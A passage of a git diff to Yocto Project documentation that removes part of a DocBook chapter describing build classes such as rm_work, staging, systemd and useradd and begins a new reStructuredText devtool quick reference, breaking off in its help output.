- Once the build system generates the packages for a recipe, the work
- files for that recipe are no longer needed.
- However, by default, the build system preserves these files
- for inspection and possible debugging purposes.
- If you would rather have these files deleted to save disk space
- as the build progresses, you can enable <filename>rm_work</filename>
- by adding the following to your <filename>local.conf</filename> file,
- which is found in the
- <link linkend='build-directory'>Build Directory</link>.
- <literallayout class='monospaced'>
- INHERIT += "rm_work"
- </literallayout>
- If you are modifying and building source code out of the work directory
- for a recipe, enabling <filename>rm_work</filename> will potentially
- result in your changes to the source being lost.
- To exclude some recipes from having their work directories deleted by
- <filename>rm_work</filename>, you can add the names of the recipe or
- recipes you are working on to the <filename>RM_WORK_EXCLUDE</filename>
- variable, which can also be set in your <filename>local.conf</filename>
- file.
- Here is an example:
- <literallayout class='monospaced'>
- RM_WORK_EXCLUDE += "busybox glibc"
- </literallayout>
- </para>
-</section>
-
-<section id='ref-classes-rootfs*'>
- <title><filename>rootfs*.bbclass</filename></title>
-
- <para>
- The <filename>rootfs*</filename> classes support creating
- the root filesystem for an image and consist of the following classes:
- <itemizedlist>
- <listitem><para>
- The <filename>rootfs-postcommands</filename> class, which
- defines filesystem post-processing functions for image recipes.
- </para></listitem>
- <listitem><para>
- The <filename>rootfs_deb</filename> class, which supports
- creation of root filesystems for images built using
- <filename>.deb</filename> packages.</para></listitem>
- <listitem><para>
- The <filename>rootfs_rpm</filename> class, which supports
- creation of root filesystems for images built using
- <filename>.rpm</filename> packages.</para></listitem>
- <listitem><para>
- The <filename>rootfs_ipk</filename> class, which supports
- creation of root filesystems for images built using
- <filename>.ipk</filename> packages.</para></listitem>
- <listitem><para>
- The <filename>rootfsdebugfiles</filename> class, which installs
- additional files found on the build host directly into the
- root filesystem.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- The root filesystem is created from packages using one of the
- <filename>rootfs*.bbclass</filename> files as determined by the
- <link linkend='var-PACKAGE_CLASSES'><filename>PACKAGE_CLASSES</filename></link>
- variable.
- </para>
-
- <para>
- For information on how root filesystem images are created, see the
- "<ulink url='&YOCTO_DOCS_OM_URL;#image-generation-dev-environment'>Image Generation</ulink>"
- section in the Yocto Project Overview and Concepts Manual.
- </para>
-</section>
-
-<section id='ref-classes-sanity'>
- <title><filename>sanity.bbclass</filename></title>
-
- <para>
- The <filename>sanity</filename> class checks to see if prerequisite
- software is present on the host system so that users can be notified
- of potential problems that might affect their build.
- The class also performs basic user configuration checks from
- the <filename>local.conf</filename> configuration file to
- prevent common mistakes that cause build failures.
- Distribution policy usually determines whether to include this class.
- </para>
-</section>
-
-<section id='ref-classes-scons'>
- <title><filename>scons.bbclass</filename></title>
-
- <para>
- The <filename>scons</filename> class supports recipes that need to
- build software that uses the SCons build system.
- You can use the
- <link linkend='var-EXTRA_OESCONS'><filename>EXTRA_OESCONS</filename></link>
- variable to specify additional configuration options you want to pass
- SCons command line.
- </para>
-</section>
-
-<section id='ref-classes-sdl'>
- <title><filename>sdl.bbclass</filename></title>
-
- <para>
- The <filename>sdl</filename> class supports recipes that need to build
- software that uses the Simple DirectMedia Layer (SDL) library.
- </para>
-</section>
-
-<section id='ref-classes-setuptools'>
- <title><filename>setuptools.bbclass</filename></title>
-
- <para>
- The <filename>setuptools</filename> class supports Python
- version 2.x extensions that use build systems based on
- <filename>setuptools</filename>.
- If your recipe uses these build systems, the recipe needs to
- inherit the <filename>setuptools</filename> class.
- </para>
-</section>
-
-<section id='ref-classes-setuptools3'>
- <title><filename>setuptools3.bbclass</filename></title>
-
- <para>
- The <filename>setuptools3</filename> class supports Python
- version 3.x extensions that use build systems based on
- <filename>setuptools3</filename>.
- If your recipe uses these build systems, the recipe needs to
- inherit the <filename>setuptools3</filename> class.
- </para>
-</section>
-
-<section id='ref-classes-sign_rpm'>
- <title><filename>sign_rpm.bbclass</filename></title>
-
- <para>
- The <filename>sign_rpm</filename> class supports generating signed
- RPM packages.
- </para>
-</section>
-
-<section id='ref-classes-sip'>
- <title><filename>sip.bbclass</filename></title>
-
- <para>
- The <filename>sip</filename> class
- supports recipes that build or package SIP-based Python bindings.
- </para>
-</section>
-
-<section id='ref-classes-siteconfig'>
- <title><filename>siteconfig.bbclass</filename></title>
-
- <para>
- The <filename>siteconfig</filename> class
- provides functionality for handling site configuration.
- The class is used by the
- <link linkend='ref-classes-autotools'><filename>autotools</filename></link>
- class to accelerate the
- <link linkend='ref-tasks-configure'><filename>do_configure</filename></link>
- task.
- </para>
-</section>
-
-<section id='ref-classes-siteinfo'>
- <title><filename>siteinfo.bbclass</filename></title>
-
- <para>
- The <filename>siteinfo</filename> class provides information about
- the targets that might be needed by other classes or recipes.
- </para>
-
- <para>
- As an example, consider Autotools, which can require tests that must
- execute on the target hardware.
- Since this is not possible in general when cross compiling, site
- information is used to provide cached test results so these tests can
- be skipped over but still make the correct values available.
- The
- <filename><link linkend='structure-meta-site'>meta/site directory</link></filename>
- contains test results sorted into different categories such as
- architecture, endianness, and the <filename>libc</filename> used.
- Site information provides a list of files containing data relevant to
- the current build in the
- <filename><link linkend='var-CONFIG_SITE'>CONFIG_SITE</link></filename> variable
- that Autotools automatically picks up.
- </para>
-
- <para>
- The class also provides variables like
- <filename><link linkend='var-SITEINFO_ENDIANNESS'>SITEINFO_ENDIANNESS</link></filename>
- and <filename><link linkend='var-SITEINFO_BITS'>SITEINFO_BITS</link></filename>
- that can be used elsewhere in the metadata.
- </para>
-</section>
-
-<section id='ref-classes-spdx'>
- <title><filename>spdx.bbclass</filename></title>
-
- <para>
- The <filename>spdx</filename> class integrates real-time license
- scanning, generation of SPDX standard output, and verification
- of license information during the build.
- <note>
- This class is currently at the prototype stage in the 1.6
- release.
- </note>
- </para>
-</section>
-
-<section id='ref-classes-sstate'>
- <title><filename>sstate.bbclass</filename></title>
-
- <para>
- The <filename>sstate</filename> class provides support for Shared
- State (sstate).
- By default, the class is enabled through the
- <link linkend='var-INHERIT_DISTRO'><filename>INHERIT_DISTRO</filename></link>
- variable's default value.
- </para>
-
- <para>
- For more information on sstate, see the
- "<ulink url='&YOCTO_DOCS_OM_URL;#shared-state-cache'>Shared State Cache</ulink>"
- section in the Yocto Project Overview and Concepts Manual.
- </para>
-</section>
-
-<section id='ref-classes-staging'>
- <title><filename>staging.bbclass</filename></title>
-
- <para>
- The <filename>staging</filename> class installs files into individual
- recipe work directories for sysroots.
- The class contains the following key tasks:
- <itemizedlist>
- <listitem><para>
- The
- <link linkend='ref-tasks-populate_sysroot'><filename>do_populate_sysroot</filename></link>
- task, which is responsible for handing the files that end up
- in the recipe sysroots.
- </para></listitem>
- <listitem><para>
- The
- <link linkend='ref-tasks-prepare_recipe_sysroot'><filename>do_prepare_recipe_sysroot</filename></link>
- task (a "partner" task to the
- <filename>populate_sysroot</filename> task), which installs
- the files into the individual recipe work directories (i.e.
- <link linkend='var-WORKDIR'><filename>WORKDIR</filename></link>).
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- The code in the <filename>staging</filename> class is complex and
- basically works in two stages:
- <itemizedlist>
- <listitem><para>
- <emphasis>Stage One:</emphasis>
- The first stage addresses recipes that have files they want
- to share with other recipes that have dependencies on the
- originating recipe.
- Normally these dependencies are installed through the
- <link linkend='ref-tasks-install'><filename>do_install</filename></link>
- task into
- <filename>${</filename><link linkend='var-D'><filename>D</filename></link><filename>}</filename>.
- The <filename>do_populate_sysroot</filename> task copies
- a subset of these files into
- <filename>${SYSROOT_DESTDIR}</filename>.
- This subset of files is controlled by the
- <link linkend='var-SYSROOT_DIRS'><filename>SYSROOT_DIRS</filename></link>,
- <link linkend='var-SYSROOT_DIRS_NATIVE'><filename>SYSROOT_DIRS_NATIVE</filename></link>,
- and
- <link linkend='var-SYSROOT_DIRS_BLACKLIST'><filename>SYSROOT_DIRS_BLACKLIST</filename></link>
- variables.
- <note>
- Additionally, a recipe can customize the files further by
- declaring a processing function in the
- <link linkend='var-SYSROOT_PREPROCESS_FUNCS'><filename>SYSROOT_PREPROCESS_FUNCS</filename></link>
- variable.
- </note>
- </para>
-
- <para>
- A shared state (sstate) object is built from these files
- and the files are placed into a subdirectory of
- <link linkend='structure-build-tmp-sysroots-components'><filename>tmp/sysroots-components/</filename></link>.
- The files are scanned for hardcoded paths to the original
- installation location.
- If the location is found in text files, the hardcoded
- locations are replaced by tokens and a list of the files
- needing such replacements is created.
- These adjustments are referred to as "FIXMEs".
- The list of files that are scanned for paths is controlled by
- the
- <link linkend='var-SSTATE_SCAN_FILES'><filename>SSTATE_SCAN_FILES</filename></link>
- variable.
- </para></listitem>
- <listitem><para>
- <emphasis>Stage Two:</emphasis>
- The second stage addresses recipes that want to use something
- from another recipe and declare a dependency on that recipe
- through the
- <link linkend='var-DEPENDS'><filename>DEPENDS</filename></link>
- variable.
- The recipe will have a
- <link linkend='ref-tasks-prepare_recipe_sysroot'><filename>do_prepare_recipe_sysroot</filename></link>
- task and when
- this task executes, it creates the
- <filename>recipe-sysroot</filename> and
- <filename>recipe-sysroot-native</filename> in the recipe
- work directory (i.e.
- <link linkend='var-WORKDIR'><filename>WORKDIR</filename></link>).
- The OpenEmbedded build system creates hard links to copies of the
- relevant files from <filename>sysroots-components</filename>
- into the recipe work directory.
- <note>
- If hard links are not possible, the build system uses
- actual copies.
- </note>
- The build system then addresses any "FIXMEs" to paths as
- defined from the list created in the first stage.
- </para>
-
- <para>
- Finally, any files in <filename>${bindir}</filename>
- within the sysroot that have the prefix
- "<filename>postinst-</filename>" are executed.
- <note>
- Although such sysroot post installation scripts are not
- recommended for general use, the files do allow some issues
- such as user creation and module indexes to be addressed.
- </note>
- </para>
-
- <para>
- Because recipes can have other dependencies outside of
- <filename>DEPENDS</filename> (e.g.
- <filename>do_unpack[depends] += "tar-native:do_populate_sysroot"</filename>),
- the sysroot creation function
- <filename>extend_recipe_sysroot</filename> is also added as
- a pre-function for those tasks whose dependencies are not
- through <filename>DEPENDS</filename> but operate similarly.
- </para>
-
- <para>
- When installing dependencies into the sysroot, the code
- traverses the dependency graph and processes dependencies
- in exactly the same way as the dependencies would or would not
- be when installed from sstate.
- This processing means, for example, a native tool would have
- its native dependencies added but a target library would not
- have its dependencies traversed or installed.
- The same sstate dependency code is used so that
- builds should be identical regardless of whether sstate
- was used or not.
- For a closer look, see the
- <filename>setscene_depvalid()</filename> function in the
- <link linkend='ref-classes-sstate'><filename>sstate</filename></link>
- class.
- </para>
-
- <para>
- The build system is careful to maintain manifests of the files
- it installs so that any given dependency can be installed as
- needed.
- The sstate hash of the installed item is also stored so that
- if it changes, the build system can reinstall it.
- </para></listitem>
- </itemizedlist>
- </para>
-</section>
-
-<section id='ref-classes-syslinux'>
- <title><filename>syslinux.bbclass</filename></title>
-
- <para>
- The <filename>syslinux</filename> class provides syslinux-specific
- functions for building bootable images.
- </para>
-
- <para>
- The class supports the following variables:
- <itemizedlist>
- <listitem><para><link linkend='var-INITRD'><filename>INITRD</filename></link>:
- Indicates list of filesystem images to concatenate and use as
- an initial RAM disk (initrd).
- This variable is optional.</para></listitem>
- <listitem><para><link linkend='var-ROOTFS'><filename>ROOTFS</filename></link>:
- Indicates a filesystem image to include as the root filesystem.
- This variable is optional.</para></listitem>
- <listitem><para><link linkend='var-AUTO_SYSLINUXMENU'><filename>AUTO_SYSLINUXMENU</filename></link>:
- Enables creating an automatic menu when set to "1".
- </para></listitem>
- <listitem><para><link linkend='var-LABELS'><filename>LABELS</filename></link>:
- Lists targets for automatic configuration.
- </para></listitem>
- <listitem><para><link linkend='var-APPEND'><filename>APPEND</filename></link>:
- Lists append string overrides for each label.
- </para></listitem>
- <listitem><para><link linkend='var-SYSLINUX_OPTS'><filename>SYSLINUX_OPTS</filename></link>:
- Lists additional options to add to the syslinux file.
- Semicolon characters separate multiple options.
- </para></listitem>
- <listitem><para><link linkend='var-SYSLINUX_SPLASH'><filename>SYSLINUX_SPLASH</filename></link>:
- Lists a background for the VGA boot menu when you are using the
- boot menu.</para></listitem>
- <listitem><para><link linkend='var-SYSLINUX_DEFAULT_CONSOLE'><filename>SYSLINUX_DEFAULT_CONSOLE</filename></link>:
- Set to "console=ttyX" to change kernel boot default console.
- </para></listitem>
- <listitem><para><link linkend='var-SYSLINUX_SERIAL'><filename>SYSLINUX_SERIAL</filename></link>:
- Sets an alternate serial port.
- Or, turns off serial when the variable is set with an
- empty string.</para></listitem>
- <listitem><para><link linkend='var-SYSLINUX_SERIAL_TTY'><filename>SYSLINUX_SERIAL_TTY</filename></link>:
- Sets an alternate "console=tty..." kernel boot argument.
- </para></listitem>
- </itemizedlist>
- </para>
-</section>
-
-<section id='ref-classes-systemd'>
- <title><filename>systemd.bbclass</filename></title>
-
- <para>
- The <filename>systemd</filename> class provides support for recipes
- that install systemd unit files.
- </para>
-
- <para>
- The functionality for this class is disabled unless you have "systemd"
- in
- <link linkend='var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></link>.
- </para>
-
- <para>
- Under this class, the recipe or Makefile (i.e. whatever the recipe is
- calling during the
- <link linkend='ref-tasks-install'><filename>do_install</filename></link>
- task) installs unit files into
- <filename>${</filename><link linkend='var-D'><filename>D</filename></link><filename>}${systemd_unitdir}/system</filename>.
- If the unit files being installed go into packages other than the
- main package, you need to set
- <link linkend='var-SYSTEMD_PACKAGES'><filename>SYSTEMD_PACKAGES</filename></link>
- in your recipe to identify the packages in which the files will be
- installed.
- </para>
-
- <para>
- You should set
- <link linkend='var-SYSTEMD_SERVICE'><filename>SYSTEMD_SERVICE</filename></link>
- to the name of the service file.
- You should also use a package name override to indicate the package
- to which the value applies.
- If the value applies to the recipe's main package, use
- <filename>${</filename><link linkend='var-PN'><filename>PN</filename></link><filename>}</filename>.
- Here is an example from the connman recipe:
- <literallayout class='monospaced'>
- SYSTEMD_SERVICE_${PN} = "connman.service"
- </literallayout>
- Services are set up to start on boot automatically unless
- you have set
- <link linkend='var-SYSTEMD_AUTO_ENABLE'><filename>SYSTEMD_AUTO_ENABLE</filename></link>
- to "disable".
- </para>
-
- <para>
- For more information on <filename>systemd</filename>, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#selecting-an-initialization-manager'>Selecting an Initialization Manager</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
-</section>
-
-<section id='ref-classes-systemd-boot'>
- <title><filename>systemd-boot.bbclass</filename></title>
-
- <para>
- The <filename>systemd-boot</filename> class provides functions specific
- to the systemd-boot bootloader for building bootable images.
- This is an internal class and is not intended to be used directly.
- <note>
- The <filename>systemd-boot</filename> class is a result from
- merging the <filename>gummiboot</filename> class used in previous
- Yocto Project releases with the <filename>systemd</filename>
- project.
- </note>
- Set the
- <link linkend='var-EFI_PROVIDER'><filename>EFI_PROVIDER</filename></link>
- variable to "systemd-boot" to use this class.
- Doing so creates a standalone EFI bootloader that is not dependent
- on systemd.
- </para>
-
- <para>
- For information on more variables used and supported in this class,
- see the
- <link linkend='var-SYSTEMD_BOOT_CFG'><filename>SYSTEMD_BOOT_CFG</filename></link>,
- <link linkend='var-SYSTEMD_BOOT_ENTRIES'><filename>SYSTEMD_BOOT_ENTRIES</filename></link>,
- and
- <link linkend='var-SYSTEMD_BOOT_TIMEOUT'><filename>SYSTEMD_BOOT_TIMEOUT</filename></link>
- variables.
- </para>
-
- <para>
- You can also see the
- <ulink url='http://www.freedesktop.org/wiki/Software/systemd/systemd-boot/'>Systemd-boot documentation</ulink>
- for more information.
- </para>
-</section>
-
-<section id='ref-classes-terminal'>
- <title><filename>terminal.bbclass</filename></title>
-
- <para>
- The <filename>terminal</filename> class provides support for starting
- a terminal session.
- The
- <link linkend='var-OE_TERMINAL'><filename>OE_TERMINAL</filename></link>
- variable controls which terminal emulator is used for the session.
- </para>
-
- <para>
- Other classes use the <filename>terminal</filename> class anywhere a
- separate terminal session needs to be started.
- For example, the
- <link linkend='ref-classes-patch'><filename>patch</filename></link>
- class assuming
- <link linkend='var-PATCHRESOLVE'><filename>PATCHRESOLVE</filename></link>
- is set to "user", the
- <link linkend='ref-classes-cml1'><filename>cml1</filename></link>
- class, and the
- <link linkend='ref-classes-devshell'><filename>devshell</filename></link>
- class all use the <filename>terminal</filename> class.
- </para>
-</section>
-
-<section id='ref-classes-testimage*'>
- <title><filename>testimage*.bbclass</filename></title>
-
- <para>
- The <filename>testimage*</filename> classes support running
- automated tests against images using QEMU and on actual hardware.
- The classes handle loading the tests and starting the image.
- To use the classes, you need to perform steps to set up the
- environment.
- <note><title>Tip</title>
- Best practices include using
- <link linkend='var-IMAGE_CLASSES'><filename>IMAGE_CLASSES</filename></link>
- rather than
- <link linkend='var-INHERIT'><filename>INHERIT</filename></link> to
- inherit the <filename>testimage</filename> class for automated
- image testing.
- </note>
- </para>
-
- <para>
- The tests are commands that run on the target system over
- <filename>ssh</filename>.
- Each test is written in Python and makes use of the
- <filename>unittest</filename> module.
- </para>
-
- <para>
- The <filename>testimage.bbclass</filename> runs tests on an image
- when called using the following:
- <literallayout class='monospaced'>
- $ bitbake -c testimage <replaceable>image</replaceable>
- </literallayout>
- The <filename>testimage-auto</filename> class runs tests on an image
- after the image is constructed (i.e.
- <link linkend='var-TESTIMAGE_AUTO'><filename>TESTIMAGE_AUTO</filename></link>
- must be set to "1").
- </para>
-
- <para>
- For information on how to enable, run, and create new tests, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#performing-automated-runtime-testing'>Performing Automated Runtime Testing</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
-</section>
-
-<section id='ref-classes-testsdk'>
- <title><filename>testsdk.bbclass</filename></title>
-
- <para>
- This class supports running automated tests against
- software development kits (SDKs).
- The <filename>testsdk</filename> class runs tests on an SDK when
- called using the following:
- <literallayout class='monospaced'>
- $ bitbake -c testsdk image
- </literallayout>
- <note><title>Tip</title>
- Best practices include using
- <link linkend='var-IMAGE_CLASSES'><filename>IMAGE_CLASSES</filename></link>
- rather than
- <link linkend='var-INHERIT'><filename>INHERIT</filename></link> to
- inherit the <filename>testsdk</filename> class for automated
- SDK testing.
- </note>
- </para>
-</section>
-
-<section id='ref-classes-texinfo'>
- <title><filename>texinfo.bbclass</filename></title>
-
- <para>
- This class should be inherited by recipes whose upstream packages
- invoke the <filename>texinfo</filename> utilities at build-time.
- Native and cross recipes are made to use the dummy scripts provided
- by <filename>texinfo-dummy-native</filename>, for improved performance.
- Target architecture recipes use the genuine
- Texinfo utilities.
- By default, they use the Texinfo utilities on the host system.
- <note>
- If you want to use the Texinfo recipe shipped with the build
- system, you can remove "texinfo-native" from
- <link linkend='var-ASSUME_PROVIDED'><filename>ASSUME_PROVIDED</filename></link>
- and makeinfo from
- <link linkend='var-SANITY_REQUIRED_UTILITIES'><filename>SANITY_REQUIRED_UTILITIES</filename></link>.
- </note>
- </para>
-</section>
-
-<section id='ref-classes-tinderclient'>
- <title><filename>tinderclient.bbclass</filename></title>
-
- <para>
- The <filename>tinderclient</filename> class submits build results to
- an external Tinderbox instance.
- <note>
- This class is currently unmaintained.
- </note>
- </para>
-</section>
-
-<section id='ref-classes-toaster'>
- <title><filename>toaster.bbclass</filename></title>
-
- <para>
- The <filename>toaster</filename> class collects information about
- packages and images and sends them as events that the BitBake
- user interface can receive.
- The class is enabled when the Toaster user interface is running.
- </para>
-
- <para>
- This class is not intended to be used directly.
- </para>
-</section>
-
-<section id='ref-classes-toolchain-scripts'>
- <title><filename>toolchain-scripts.bbclass</filename></title>
-
- <para>
- The <filename>toolchain-scripts</filename> class provides the scripts
- used for setting up the environment for installed SDKs.
- </para>
-</section>
-
-<section id='ref-classes-typecheck'>
- <title><filename>typecheck.bbclass</filename></title>
-
- <para>
- The <filename>typecheck</filename> class provides support for
- validating the values of variables set at the configuration level
- against their defined types.
- The OpenEmbedded build system allows you to define the type of a
- variable using the "type" varflag.
- Here is an example:
- <literallayout class='monospaced'>
- IMAGE_FEATURES[type] = "list"
- </literallayout>
- </para>
-</section>
-
-<section id='ref-classes-uboot-config'>
- <title><filename>uboot-config.bbclass</filename></title>
-
- <para>
- The <filename>uboot-config</filename> class provides support for
- U-Boot configuration for a machine.
- Specify the machine in your recipe as follows:
- <literallayout class='monospaced'>
- UBOOT_CONFIG ??= &lt;default&gt;
- UBOOT_CONFIG[foo] = "config,images"
- </literallayout>
- You can also specify the machine using this method:
- <literallayout class='monospaced'>
- UBOOT_MACHINE = "config"
- </literallayout>
- See the
- <link linkend='var-UBOOT_CONFIG'><filename>UBOOT_CONFIG</filename></link>
- and
- <link linkend='var-UBOOT_MACHINE'><filename>UBOOT_MACHINE</filename></link>
- variables for additional information.
- </para>
-</section>
-
-<section id='ref-classes-uninative'>
- <title><filename>uninative.bbclass</filename></title>
-
- <para>
- Attempts to isolate the build system from the host
- distribution's C library in order to make re-use of native shared state
- artifacts across different host distributions practical.
- With this class enabled, a tarball containing a pre-built C library
- is downloaded at the start of the build.
- In the Poky reference distribution this is enabled by default
- through
- <filename>meta/conf/distro/include/yocto-uninative.inc</filename>.
- Other distributions that do not derive from poky can also
- "<filename>require conf/distro/include/yocto-uninative.inc</filename>"
- to use this.
- Alternatively if you prefer, you can build the uninative-tarball recipe
- yourself, publish the resulting tarball (e.g. via HTTP) and set
- <filename>UNINATIVE_URL</filename> and
- <filename>UNINATIVE_CHECKSUM</filename> appropriately.
- For an example, see the
- <filename>meta/conf/distro/include/yocto-uninative.inc</filename>.
- </para>
-
- <para>
- The <filename>uninative</filename> class is also used unconditionally
- by the extensible SDK.
- When building the extensible SDK,
- <filename>uninative-tarball</filename> is built and the resulting
- tarball is included within the SDK.
- </para>
-</section>
-
-<section id='ref-classes-update-alternatives'>
- <title><filename>update-alternatives.bbclass</filename></title>
-
- <para>
- The <filename>update-alternatives</filename> class helps the
- alternatives system when multiple sources provide the same command.
- This situation occurs when several programs that have the same or
- similar function are installed with the same name.
- For example, the <filename>ar</filename> command is available from the
- <filename>busybox</filename>, <filename>binutils</filename> and
- <filename>elfutils</filename> packages.
- The <filename>update-alternatives</filename> class handles
- renaming the binaries so that multiple packages can be installed
- without conflicts.
- The <filename>ar</filename> command still works regardless of which
- packages are installed or subsequently removed.
- The class renames the conflicting binary in each package and symlinks
- the highest priority binary during installation or removal of packages.
- </para>
-
- <para>
- To use this class, you need to define a number of variables:
- <itemizedlist>
- <listitem><para><link linkend='var-ALTERNATIVE'><filename>ALTERNATIVE</filename></link>
- </para></listitem>
- <listitem><para><link linkend='var-ALTERNATIVE_LINK_NAME'><filename>ALTERNATIVE_LINK_NAME</filename></link>
- </para></listitem>
- <listitem><para><link linkend='var-ALTERNATIVE_TARGET'><filename>ALTERNATIVE_TARGET</filename></link>
- </para></listitem>
- <listitem><para><link linkend='var-ALTERNATIVE_PRIORITY'><filename>ALTERNATIVE_PRIORITY</filename></link>
- </para></listitem>
- </itemizedlist>
- These variables list alternative commands needed by a package,
- provide pathnames for links, default links for targets, and
- so forth.
- For details on how to use this class, see the comments in the
- <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/poky/tree/meta/classes/update-alternatives.bbclass'><filename>update-alternatives.bbclass</filename></ulink>
- file.
- </para>
-
- <note>
- You can use the <filename>update-alternatives</filename> command
- directly in your recipes.
- However, this class simplifies things in most cases.
- </note>
-</section>
-
-<section id='ref-classes-update-rc.d'>
- <title><filename>update-rc.d.bbclass</filename></title>
-
- <para>
- The <filename>update-rc.d</filename> class uses
- <filename>update-rc.d</filename> to safely install an
- initialization script on behalf of the package.
- The OpenEmbedded build system takes care of details such as making
- sure the script is stopped before a package is removed and started when
- the package is installed.
- </para>
-
- <para>
- Three variables control this class:
- <filename><link linkend='var-INITSCRIPT_PACKAGES'>INITSCRIPT_PACKAGES</link></filename>,
- <filename><link linkend='var-INITSCRIPT_NAME'>INITSCRIPT_NAME</link></filename> and
- <filename><link linkend='var-INITSCRIPT_PARAMS'>INITSCRIPT_PARAMS</link></filename>.
- See the variable links for details.
- </para>
-</section>
-
-<section id='ref-classes-useradd'>
- <title><filename>useradd*.bbclass</filename></title>
-
- <para>
- The <filename>useradd*</filename> classes support the addition of users
- or groups for usage by the package on the target.
- For example, if you have packages that contain system services that
- should be run under their own user or group, you can use these classes
- to enable creation of the user or group.
- The
- <filename>meta-skeleton/recipes-skeleton/useradd/useradd-example.bb</filename>
- recipe in the <link linkend='source-directory'>Source Directory</link>
- provides a simple example that shows how to add three
- users and groups to two packages.
- See the <filename>useradd-example.bb</filename> recipe for more
- information on how to use these classes.
- </para>
-
- <para>
- The <filename>useradd_base</filename> class provides basic
- functionality for user or groups settings.
- </para>
-
- <para>
- The <filename>useradd*</filename> classes support the
- <link linkend='var-USERADD_PACKAGES'><filename>USERADD_PACKAGES</filename></link>,
- <link linkend='var-USERADD_PARAM'><filename>USERADD_PARAM</filename></link>,
- <link linkend='var-GROUPADD_PARAM'><filename>GROUPADD_PARAM</filename></link>,
- and
- <link linkend='var-GROUPMEMS_PARAM'><filename>GROUPMEMS_PARAM</filename></link>
- variables.
- </para>
-
- <para>
- The <filename>useradd-staticids</filename> class supports the addition
- of users or groups that have static user identification
- (<filename>uid</filename>) and group identification
- (<filename>gid</filename>) values.
- </para>
-
- <para>
- The default behavior of the OpenEmbedded build system for assigning
- <filename>uid</filename> and <filename>gid</filename> values when
- packages add users and groups during package install time is to
- add them dynamically.
- This works fine for programs that do not care what the values of the
- resulting users and groups become.
- In these cases, the order of the installation determines the final
- <filename>uid</filename> and <filename>gid</filename> values.
- However, if non-deterministic
- <filename>uid</filename> and <filename>gid</filename> values are a
- problem, you can override the default, dynamic application of these
- values by setting static values.
- When you set static values, the OpenEmbedded build system looks in
- <link linkend='var-BBPATH'><filename>BBPATH</filename></link> for
- <filename>files/passwd</filename> and <filename>files/group</filename>
- files for the values.
- </para>
-
- <para>
- To use static <filename>uid</filename> and <filename>gid</filename>
- values, you need to set some variables.
- See the
- <link linkend='var-USERADDEXTENSION'><filename>USERADDEXTENSION</filename></link>,
- <link linkend='var-USERADD_UID_TABLES'><filename>USERADD_UID_TABLES</filename></link>,
- <link linkend='var-USERADD_GID_TABLES'><filename>USERADD_GID_TABLES</filename></link>,
- and
- <link linkend='var-USERADD_ERROR_DYNAMIC'><filename>USERADD_ERROR_DYNAMIC</filename></link>
- variables.
- You can also see the
- <link linkend='ref-classes-useradd'><filename>useradd</filename></link>
- class for additional information.
- </para>
-
- <note><title>Notes</title>
- You do not use the <filename>useradd-staticids</filename>
- class directly.
- You either enable or disable the class by setting the
- <filename>USERADDEXTENSION</filename> variable.
- If you enable or disable the class in a configured system,
- <link linkend='var-TMPDIR'><filename>TMPDIR</filename></link>
- might contain incorrect <filename>uid</filename> and
- <filename>gid</filename> values.
- Deleting the <filename>TMPDIR</filename> directory
- will correct this condition.
- </note>
-</section>
-
-<section id='ref-classes-utility-tasks'>
- <title><filename>utility-tasks.bbclass</filename></title>
-
- <para>
- The <filename>utility-tasks</filename> class provides support for
- various "utility" type tasks that are applicable to all recipes,
- such as
- <link linkend='ref-tasks-clean'><filename>do_clean</filename></link> and
- <link linkend='ref-tasks-listtasks'><filename>do_listtasks</filename></link>.
- </para>
-
- <para>
- This class is enabled by default because it is inherited by
- the
- <link linkend='ref-classes-base'><filename>base</filename></link>
- class.
- </para>
-</section>
-
-<section id='ref-classes-utils'>
- <title><filename>utils.bbclass</filename></title>
-
- <para>
- The <filename>utils</filename> class provides some useful Python
- functions that are typically used in inline Python expressions
- (e.g. <filename>${@...}</filename>).
- One example use is for <filename>bb.utils.contains()</filename>.
- </para>
-
- <para>
- This class is enabled by default because it is inherited by the
- <link linkend='ref-classes-base'><filename>base</filename></link>
- class.
- </para>
-</section>
-
-<section id='ref-classes-vala'>
- <title><filename>vala.bbclass</filename></title>
-
- <para>
- The <filename>vala</filename> class supports recipes that need to
- build software written using the Vala programming language.
- </para>
-</section>
-
-<section id='ref-classes-waf'>
- <title><filename>waf.bbclass</filename></title>
-
- <para>
- The <filename>waf</filename> class supports recipes that need to build
- software that uses the Waf build system.
- You can use the
- <link linkend='var-EXTRA_OECONF'><filename>EXTRA_OECONF</filename></link>
- or
- <link linkend='var-PACKAGECONFIG_CONFARGS'><filename>PACKAGECONFIG_CONFARGS</filename></link>
- variables to specify additional configuration options to be passed on
- the Waf command line.
- </para>
-</section>
-
-<!-- Undocumented classes are:
- image-empty.bbclass (possibly being dropped)
- migrate_localcount.bbclass (still need a description)
--->
-
-
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/ref-manual/ref-devtool-reference.rst b/documentation/ref-manual/ref-devtool-reference.rst
new file mode 100644
index 0000000000..9b9ddf53f5
--- /dev/null
+++ b/documentation/ref-manual/ref-devtool-reference.rst
@@ -0,0 +1,631 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+***************************
+``devtool`` Quick Reference
+***************************
+
+The ``devtool`` command-line tool provides a number of features that
+help you build, test, and package software. This command is available
+alongside the ``bitbake`` command. Additionally, the ``devtool`` command
+is a key part of the extensible SDK.
+
+This chapter provides a Quick Reference for the ``devtool`` command. For
+more information on how to apply the command when using the extensible
+SDK, see the ":doc:`../sdk-manual/sdk-extensible`" chapter in the Yocto
+Project Application Development and the Extensible Software Development
+Kit (eSDK) manual.
+
+.. _devtool-getting-help:
+
+Getting Help
+============
+
+The ``devtool`` command line is organized similarly to Git in that it
+has a number of sub-commands for each function. You can run
+``devtool --help`` to see all the commands:
+::
+
+ $ devtool -h
+ NOTE: Starting bitbake server...
+ usage: devtool [--basepath BASEPATH] [--bbpath BBPATH] [-d] [-q] [--color COLOR] [-h] <subcommand> ...
+
+ OpenEmbedded development tool
+
+ options:
+ --basepath BASEPATH Base directory of SDK / build directory
+ --bbpath BBPATH Explicitly specify the BBPATH, rather than getting it from the metadata
+ -d, --debug Enable debug output
